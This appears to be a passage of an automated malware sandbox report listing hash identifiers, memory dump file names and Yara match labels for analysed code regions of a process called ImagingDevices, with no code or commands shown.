                                                                                                  • Opcode ID: db2119342092925a6dc74bb9450141eb0de7b27afd925301b4c2c1597eed996d
                                                                                                  • Instruction ID: bba1ee344f99dcb89ae65f1ac12334d67906136d5b69c4fc7b54d317e1023ca0
                                                                                                  • Opcode Fuzzy Hash: db2119342092925a6dc74bb9450141eb0de7b27afd925301b4c2c1597eed996d
                                                                                                  • Instruction Fuzzy Hash: E691F97291832ACBCB148F05C4901BA7BA2FFA4755B25816EFD818F391E774C991E7E0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 21ffe123f40ef825153bc761b7cce134d9635d19df2a97450d202dc2dcbd4d4e
                                                                                                  • Instruction ID: 9a08ecc266f51fc11ce9d80620f29293d480261e2145257c679b7a979acf5162
                                                                                                  • Opcode Fuzzy Hash: 21ffe123f40ef825153bc761b7cce134d9635d19df2a97450d202dc2dcbd4d4e
                                                                                                  • Instruction Fuzzy Hash: 2B61B3315006319FDB248F11D478FBBBBB9EF66714F5581B8E4492B299D338A846CF90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 08993491d670df99ecaa9a9068b6dd4666293aed9bc8ce339d73791abddb703a
                                                                                                  • Instruction ID: df71b952612c3249adc26652761ab61f8f35a75cd64ec8087bdb8bda8f69b97d
                                                                                                  • Opcode Fuzzy Hash: 08993491d670df99ecaa9a9068b6dd4666293aed9bc8ce339d73791abddb703a
                                                                                                  • Instruction Fuzzy Hash: 4851CF73E115298BE3088E19CC00259B7A3EBC4314F3AC679DC28DB385DAB9D91286C0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9641c576afafddcf6246af5b5d904b40a6be14fea435a6ab0a829f07064fcca9
                                                                                                  • Instruction ID: 0bc58b04cd1a0c642ba1ff508fb2a3535a6a65e51fdcc29c1cad0d8825b4fc13
                                                                                                  • Opcode Fuzzy Hash: 9641c576afafddcf6246af5b5d904b40a6be14fea435a6ab0a829f07064fcca9
                                                                                                  • Instruction Fuzzy Hash: F95179B2F546289BCB18CB1D8C9052ABBF2FFC432171E8269D865D7311C670DC819784
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ad2e227d4ee62184054d21c0dec7425c11b2353c22f09fd01f6817d15bf8066f
                                                                                                  • Instruction ID: b7e3d5f802db61a77af992bad9d381a3fda5d775de84f76c7566b26d47f92f78
                                                                                                  • Opcode Fuzzy Hash: ad2e227d4ee62184054d21c0dec7425c11b2353c22f09fd01f6817d15bf8066f
                                                                                                  • Instruction Fuzzy Hash: C85182B3E14A214BD3188E09CC40632B792EFD8312B5F81BADD199B357CA74E9529A90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dcfffacc2d90934b02b8d513937dd1449233c5499f3b5c14b8a2e053c6a4daee
                                                                                                  • Instruction ID: 04009944686461c73d890484b5bc7b776b94432513094d237ae3e1dc960653aa
                                                                                                  • Opcode Fuzzy Hash: dcfffacc2d90934b02b8d513937dd1449233c5499f3b5c14b8a2e053c6a4daee
                                                                                                  • Instruction Fuzzy Hash: 275183B3E14A214BD3188E09CC50632B692EFD8312B5F81BEDD199B357CE74ED529A90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ddeb7429a1735862b447e69653d730ee678486fb446c5dc32128f4d007ccf691
                                                                                                  • Instruction ID: f948740b25c4082c99e2738ce8d7aca2006bc3f6e9838846551b8ef2274b9dfd
                                                                                                  • Opcode Fuzzy Hash: ddeb7429a1735862b447e69653d730ee678486fb446c5dc32128f4d007ccf691
                                                                                                  • Instruction Fuzzy Hash: F051BE7510470ADBCB24AF28C880ABA77F4FF45709B2085AEF982DB291E770D951D761
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2f35b4124e1790e972c35e81b73c09fc9e68a35dd2fdfc29c9a2a4ba0f33d34a
                                                                                                  • Instruction ID: dfa302065db9846ab79b0d05fbe13aea1c2fc6b6a9715e12efa534989c0f2236
                                                                                                  • Opcode Fuzzy Hash: 2f35b4124e1790e972c35e81b73c09fc9e68a35dd2fdfc29c9a2a4ba0f33d34a
                                                                                                  • Instruction Fuzzy Hash: 874116702042AD9FEB28AE26C8A1F7337E9FB43355F18541EE9C3CB592D7609842D720
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f92b4901e14b3ab99fa25680417917dcbf94e29b4610ae4eb16e227f938385b2
                                                                                                  • Instruction ID: 5718794ac6d27e4a54a639dd1f601caeb08ee7f6b4633548ff558021807107a1
                                                                                                  • Opcode Fuzzy Hash: f92b4901e14b3ab99fa25680417917dcbf94e29b4610ae4eb16e227f938385b2
                                                                                                  • Instruction Fuzzy Hash: 76411334204B9ADAC720CF29C4806F6BBF5FF99314F168949E4D58B252D336E886DB60
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6a9533da65712b6a58bf2eb28af00ead2ad1f83e0dff47293d6f5df82446ee51
                                                                                                  • Instruction ID: aa3ccfad782c72e8213a0920b2a76557c5bfdf7b5c4b5ddedd22e23c7d81ddf8
                                                                                                  • Opcode Fuzzy Hash: 6a9533da65712b6a58bf2eb28af00ead2ad1f83e0dff47293d6f5df82446ee51
                                                                                                  • Instruction Fuzzy Hash: 2941A2116586F14ED31E436E08B9675AFC18E9720174EC2FEDADA6F2F3C0988419D3A5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                  • Instruction ID: be4e6c4af12396025ce2767f8201240d105e7470908340857892b732c948fd04
                                                                                                  • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                  • Instruction Fuzzy Hash: BD3182116586F10DD30E436E08BD675AEC18E5720174EC2FEDADA6F2F3C0988418D3A5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0c9fe790c6069a8744e92368b9d6750f5f4fe1f509bd5418a791ccdf81c5bd73
                                                                                                  • Instruction ID: 5df228dc37ab882966b161abeccc762b7310679e9a32123d3a7a87a9713cc83a
                                                                                                  • Opcode Fuzzy Hash: 0c9fe790c6069a8744e92368b9d6750f5f4fe1f509bd5418a791ccdf81c5bd73
                                                                                                  • Instruction Fuzzy Hash: 2931D172B106265BD754CE3AD880656F7E2FB88310B94863AD919C3B80E778FD61C7D0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f08ad9c402d135aadbb2d4faaed9ecad1f1557e9a286002b1a5f2d04b28cbb18
                                                                                                  • Instruction ID: de4d67f93e86eaf27a0d68d12a9961254fae9c7d37f3bec015ca2f60e506bfd2
                                                                                                  • Opcode Fuzzy Hash: f08ad9c402d135aadbb2d4faaed9ecad1f1557e9a286002b1a5f2d04b28cbb18
                                                                                                  • Instruction Fuzzy Hash: 30319F72A14A108FD368CE6DD941613B7E5AB8C310B418B6EE85ED7790DA78FD01CB84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                  • Instruction ID: ae60f1a22cb69339c42929c386561dfbe2ba494c769b5c8fdb3ed68af88c931e
                                                                                                  • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                  • Instruction Fuzzy Hash: D8F0AF21324559BFDF48FA989951A7A3396FB94300F68C039A949DB246D6219D408692
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                  • Instruction ID: 01c7ce6cf5c3ee3bb87584003b9cc20e4cf97365ee07633cffb879c73c3f34e7
                                                                                                  • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                  • Instruction Fuzzy Hash: 84F034722402089BCB1C8F08C4A1BA937A2FB90719F24812EE50ACF790D739E881CA94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cbe0db1d2b52d0aaccb08120e9b852ff341ff293b10dddf7f49feef1275075da
                                                                                                  • Instruction ID: 32e2e7e45ec4a1f8ea2e438a0f1b02d7170ac911d2d28172b006a9f1f3150717
                                                                                                  • Opcode Fuzzy Hash: cbe0db1d2b52d0aaccb08120e9b852ff341ff293b10dddf7f49feef1275075da
                                                                                                  • Instruction Fuzzy Hash: 0DE06571644A80CBC311DF188900B1AB2E4FB88B10F10883AE409C7750D778DA098962
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6adfed34e4d11b18b003a1d8dade06ca9000d8283b5ddeecbe4a2a3bde6e4b59
                                                                                                  • Instruction ID: ae2d6d2b2e77ad23a362bc03d96ef037974236a2093d28c717d963bf66ce03d1
                                                                                                  • Opcode Fuzzy Hash: 6adfed34e4d11b18b003a1d8dade06ca9000d8283b5ddeecbe4a2a3bde6e4b59
                                                                                                  • Instruction Fuzzy Hash: EFC08C3E949288C6DF2AE26875952ECFF88FC8102874C29DBCDCC2EC81C20084A2C3C1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                  • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                  • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                  • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                  • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                                                  • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                  • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                  • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                  • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                  • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                  • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                                                  • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                  • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                                                  Memory Dump Source
